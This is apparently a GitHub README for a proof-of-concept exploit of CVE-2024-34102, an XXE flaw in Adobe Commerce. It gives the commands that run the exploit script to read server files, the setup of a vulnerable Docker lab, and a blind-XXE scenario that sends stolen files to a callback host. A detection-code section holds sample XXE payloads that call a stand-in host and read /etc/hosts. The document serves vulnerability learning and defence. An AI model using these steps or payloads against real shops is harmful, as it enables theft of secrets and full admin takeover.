
CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Associated Vulnerability
Title: XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Description: PoC for CVE-2024-34102
Readme
# CVE-2024-34102
★ Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. ★
## Description
CVE-2024-34102: Adobe Commerce XXE vulnerability
Description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
## How to use
### Git clone
```
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
```

### Example
```sh
python CVE-2024-34102.py -u https://magento.test -f /etc/hosts
```

### Output
![image](https://github.com/user-attachments/assets/1320573f-bb46-4d34-b2bf-42c0a8ce28fd)

## Vulnerable Environment Based on Docker
Thanks to markshust's Docker configuration for Magento, it isn't hard to build the vulnerable development environment:
https://github.com/markshust/docker-magento
```sh
# Create your project directory then go into it:
mkdir /opt/magento
cd $_

# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl

# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/

# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.

# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts
```

![image](https://github.com/user-attachments/assets/4c556255-41c5-489a-9adb-a7bcb4e24169)

## PHPSTORM
You can debug your Magento instance using PHPSTORM.

### 1. Turn on Xdebug with the following command:
```sh
bin/xdebug enable
```

### 2. Then set up your PHPSTORM like this:
![image](https://github.com/user-attachments/assets/b4554989-d2af-452c-ada9-28b4b0352060)

Then you can debug your Magento instance.

# Attack Scenario
Create a callback URL (mocky API) -> blind XXE attack (CVE-2024-34102) -> file contents are sent to the attacker's instance (SSRFUtility) -> read them back from the attacker's instance (SSRFUtility)
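From the defender's side, the chain above depends on XML features a commerce API never needs from a client: a DOCTYPE, external (SYSTEM/PUBLIC) entities, and parameter entities used for the blind, out-of-band step. The following is an added example, not code from this repository, showing request-body inspection logic that flags those features; the sample bodies are constructed and the `callback.example` host is a placeholder.

```python
import re

# Constructed sample request bodies (not captured traffic).
SAMPLES = {
    "benign": '<?xml version="1.0"?><order><id>42</id></order>',
    "internal_entity": '<!DOCTYPE d [<!ENTITY co "Example Corp">]><doc>&co;</doc>',
    "blind_xxe": ('<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % ext SYSTEM '
                  '"http://callback.example/remote.dtd"> %ext;]><x/>'),
    "local_file": '<!DOCTYPE x [<!ENTITY f SYSTEM "file:///etc/hosts">]><x>&f;</x>',
}

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "pubid" "uri">
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.-]+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"', re.I)
PARAM_REF_RE = re.compile(r"%[\w.-]+;")   # parameter-entity reference inside the DTD


def xxe_indicators(body: str) -> dict:
    """Return XXE risk indicators for one XML request body.

    Flags a DOCTYPE at all, every external entity declaration, parameter
    entities (the blind / out-of-band variant), and the URI scheme of each
    external entity so that http(s) callbacks and file: reads stand out.
    """
    findings = {"doctype": bool(DOCTYPE_RE.search(body)),
                "external_entities": [], "parameter_entity": False, "schemes": set()}
    for pct, name, uri in EXT_ENTITY_RE.findall(body):
        findings["external_entities"].append(name)
        if pct:
            findings["parameter_entity"] = True
        findings["schemes"].add(uri.split(":", 1)[0].lower() if ":" in uri else "(relative)")
    if PARAM_REF_RE.search(body):
        findings["parameter_entity"] = True
    return findings


def risk_level(body: str) -> str:
    """Map indicators to an action: block on any external reference, alert on any DTD."""
    f = xxe_indicators(body)
    if f["external_entities"]:
        return "high"      # external resource reference: block and alert
    if f["doctype"]:
        return "medium"    # DTD present; internal entities alone still allow entity-expansion DoS
    return "low"


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:16s} {risk_level(body):6s} {xxe_indicators(body)}")
```

The same logic can run over a WAF or reverse-proxy log of POST bodies; on the REST endpoints of a shop, a "medium" or "high" result is a sound block-and-investigate trigger because legitimate clients do not send DTDs.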

# Disclaimer
This repository is not intended to be an XXE exploit for CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do
